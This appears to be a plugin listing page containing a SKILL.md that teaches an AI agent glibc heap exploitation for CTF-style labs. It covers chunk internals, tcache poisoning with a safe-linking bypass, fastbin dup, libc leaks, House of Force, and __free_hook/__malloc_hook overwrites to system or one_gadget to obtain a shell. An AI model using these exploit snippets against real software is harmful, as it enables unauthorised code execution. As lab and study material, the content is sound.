What is heap exploitation?

Techniques that manipulate glibc malloc/free internals to gain arbitrary memory access or control flow, using patterns like UAF, double free, and tcache/fastbin attacks.

What prerequisites do I need?

Understanding C memory management, experience with GDB/pwndbg, pwntools, and basic binary exploitation concepts.

Is this safe to practice?

Only in legal, controlled labs or environments you own or have explicit permission to test; use isolated VM sandboxes to avoid harming systems.

Heap Exploitation

npx machina-cli add skill allsmog/pwn-claude-plugin/heap-exploitation --openclaw

Files (1)

SKILL.md

7.9 KB

Heap Exploitation

Overview

Heap exploitation targets vulnerabilities in dynamic memory allocation (malloc/free). This skill covers glibc heap internals, common vulnerabilities, and exploitation techniques from basic to advanced.

Prerequisites

Understanding of C memory management
GDB with pwndbg (for heap visualization)
Knowledge of basic binary exploitation
Familiarity with pwntools

Heap Internals Quick Reference

Chunk Structure

┌──────────────────┐
│ prev_size        │ ← Only if previous chunk is free
├──────────────────┤
│ size      | AMP  │ ← A=allocated, M=mmap, P=prev_inuse
├──────────────────┤
│ user data        │ ← Returned by malloc()
│ ...              │
└──────────────────┘

Free Chunk (adds fd/bk pointers)

┌──────────────────┐
│ prev_size        │
├──────────────────┤
│ size             │
├──────────────────┤
│ fd               │ ← Forward pointer to next free chunk
├──────────────────┤
│ bk               │ ← Back pointer to previous free chunk
├──────────────────┤
│ (fd_nextsize)    │ ← Only for large chunks
├──────────────────┤
│ (bk_nextsize)    │ ← Only for large chunks
└──────────────────┘

Bin Types

Bin	Size Range	Behavior	Security
Tcache	0x20-0x410	Per-thread LIFO	Minimal (< 2.32)
Fastbin	0x20-0x80	Global LIFO	Size check only
Unsorted	Any	Temporary holding	Some checks
Small	< 0x400	FIFO by size	FIFO checks
Large	>= 0x400	Best fit	Complex checks

Vulnerability Types

1. Use-After-Free (UAF)

Access freed memory - can leak or corrupt heap metadata.

Detection pattern:

free(ptr);
// ptr not nullified
ptr->field = value;  // UAF write
data = ptr->field;   // UAF read

2. Double Free

Free the same chunk twice - corrupts free lists.

Detection pattern:

free(ptr);
// ...
free(ptr);  // Same pointer freed again

3. Heap Overflow

Write beyond chunk boundary into adjacent chunks.

Detection pattern:

char *buf = malloc(32);
read(0, buf, 100);  // Overflow into next chunk

4. Off-by-One/Null

Overflow single byte, often corrupting size field.

Detection pattern:

buf[size] = '\0';  // Should be buf[size-1]

Exploitation Techniques

Technique 1: Tcache Poisoning (glibc 2.26+)

Requirements: UAF write or heap overflow

Process:

Allocate chunks of same size
Free to populate tcache
Overwrite freed chunk's fd pointer
Allocate twice - second returns target address

# Tcache: chunk0 -> chunk1 -> NULL
free(0)
free(1)

# Overwrite chunk1.fd to target
edit(1, p64(target_addr))

# Tcache: chunk1 -> target -> ???
alloc(2)  # Gets chunk1
alloc(3)  # Gets target!

Safe-Linking Bypass (glibc 2.32+):

# fd is now XOR'd: PROTECT_PTR(pos, ptr) = (pos >> 12) ^ ptr
chunk_addr = heap_leak + offset
protected_fd = (chunk_addr >> 12) ^ target
edit(1, p64(protected_fd))

Technique 2: Fastbin Dup (glibc < 2.26 or full tcache)

Requirements: Double free capability

Process:

Free chunk A
Free chunk B (different chunk)
Free chunk A again (creates cycle)
Allocate and write target as fd
Allocate 3 times - third returns target

free(0)  # A
free(1)  # B
free(0)  # A again - fastbin: A -> B -> A

alloc(2, p64(target))  # Gets A, writes target as fd
alloc(3)  # Gets B
alloc(4)  # Gets A
alloc(5)  # Gets target!

Technique 3: Unsorted Bin Leak

Requirements: UAF read, chunk size > tcache (0x410+)

Process:

Allocate large chunk (> 0x410)
Allocate guard chunk (prevent top consolidation)
Free large chunk (goes to unsorted bin)
Read fd/bk (points to main_arena in libc)

alloc(0, 0x420)  # Large chunk
alloc(1, 0x20)   # Guard
free(0)          # To unsorted bin

leak = read(0)   # fd/bk point to main_arena
libc_base = u64(leak) - main_arena_offset - 96

Technique 4: House of Force

Requirements: Heap overflow into top chunk, controlled malloc size

Process:

Overflow top chunk size to -1 (0xffffffffffffffff)
Calculate distance to target
Allocate distance (wraps around)
Next allocation lands at target

# Overflow top chunk size
edit(0, b'A' * chunk_size + p64(0xffffffffffffffff))

# Calculate distance
distance = target_addr - top_chunk_addr - 0x20

# Allocate gap
alloc(1, distance)

# This lands at target
alloc(2, 0x20)

Technique 5: Tcache Struct Corruption

Requirements: Large overflow or arbitrary write primitive

Process:

Corrupt tcache_perthread_struct
Set counts to indicate entries exist
Set entry pointers to target addresses
Allocate to get arbitrary locations

Common Targets

__malloc_hook (glibc < 2.34)

malloc_hook = libc.symbols['__malloc_hook']
one_gadget = libc.address + 0xe3b2e

# Write one_gadget to malloc_hook
tcache_poison(malloc_hook)
edit(chunk_at_hook, p64(one_gadget))

# Trigger malloc -> shell
alloc(trigger)

__free_hook (glibc < 2.34)

free_hook = libc.symbols['__free_hook']
system = libc.symbols['system']

# Write system to free_hook
tcache_poison(free_hook)
edit(chunk_at_hook, p64(system))

# free(chunk_with_"/bin/sh") -> system("/bin/sh")
alloc(trigger, b'/bin/sh\x00')
free(trigger)

Modern Targets (glibc 2.34+)

When hooks are removed:

_IO_list_all - File Stream Oriented Programming (FSOP)
TLS structures - tcache_perthread_struct
Stack addresses via environ
Function pointers in heap structures

Debugging Heap

pwndbg Commands

heap              # Show all chunks
bins              # Show all free lists
tcachebins        # Tcache entries
fastbins          # Fastbin entries
unsortedbin       # Unsorted bin
vis_heap_chunks   # Visual representation
arena             # Main arena info

Useful Breakpoints

b *malloc
b *free
b *__libc_malloc
b *_int_malloc
b *_int_free

Mitigation Timeline

glibc	Change
2.26	Tcache introduced
2.27	Tcache count checks
2.29	Tcache key field (double-free detection)
2.32	Safe-linking (fd pointer obfuscation)
2.34	Hooks removed (__malloc_hook, etc.)

Output Format

## Heap Exploitation

### Vulnerability Identified
- Type: Tcache poisoning via UAF
- Chunk size: 0x30
- Primitive: Arbitrary write

### Exploitation Strategy
1. Leak heap base via UAF read
2. Leak libc via unsorted bin
3. Tcache poison to __free_hook
4. Overwrite with system
5. Free chunk containing "/bin/sh"

### Key Addresses
- heap base: 0x555555559000
- libc base: 0x7f1234567000
- __free_hook: 0x7f1234789000
- system: 0x7f1234600000

### Payload
[See exploit.py]

### Result
- Shell obtained as expected user

Additional Resources

Templates

${CLAUDE_PLUGIN_ROOT}/templates/heap-basic.py - Basic heap exploitation template

References

references/tcache-internals.md - Detailed tcache structure
references/house-techniques.md - House of X techniques
references/heap-mitigations.md - Bypass techniques for each mitigation

Source

git clone https://github.com/allsmog/pwn-claude-plugin/blob/main/pwn-htb/skills/heap-exploitation/SKILL.mdView on GitHub

Overview

This skill teaches you to identify and exploit heap-based memory corruption in glibc, including UAF, double free, tcache poisoning, fastbin attacks, and related techniques from basic to advanced. It covers heap internals, vulnerability patterns, and practical exploitation steps. Learn how malloc/free interactions can be weaponized in controlled labs.

How This Skill Works

You’ll map glibc heap internals, understand chunk layouts and bin types, and study how free lists can be corrupted. The skill walks through practical exploitation techniques such as tcache poisoning (with Safe-Linking bypass), fastbin dup, and unsorted bin leaks, giving you a spectrum of real-world approaches.

When to Use It

When you need to exploit heap-based vulnerabilities such as heap overflow, use-after-free, double free, or UAF in glibc.
When you want to implement or learn Tcache Poisoning and Fastbin attacks.
When debugging heap corruption in a lab using GDB with pwndbg and pwntools.
When studying heap feng shui or House of Force concepts in practice.
When preparing for CTFs or security assessments involving heap exploitation.

Quick Start

Step 1: Set up a vulnerable binary in a controlled lab with pwndbg.
Step 2: Identify vulnerability type (UAF, double free, overflow) and relevant bins.
Step 3: Choose a technique (e.g., tcache poisoning or fastbin dup) and implement a repeatable exploit script.

Best Practices

Set up a dedicated vulnerable-binary lab and practice environment with GDB/pwndbg.
Thoroughly map chunk structures and free-list states before attempting an exploit.
Start with simpler primitives (e.g., UAF) to validate technique before progressing to complex chains.
Account for mitigations like Safe-Linking by version and tailor techniques accordingly.
Document reproducible steps and verify exploitation with repeatable tooling (pwntools/pwndbg scripts).

Example Use Cases

Tcache poisoning to redirect malloc to a target address and perform arbitrary write.
Safe-Linking bypass for glibc 2.32+ to reach a controlled pointer.
Fastbin dup attack to craft a write-what-where primitive.
Unsorted bin leak to disclose libc addresses and leak information.
Use-After-Free leading to heap metadata corruption and arbitrary memory write.

Frequently Asked Questions

Add this skill to your agents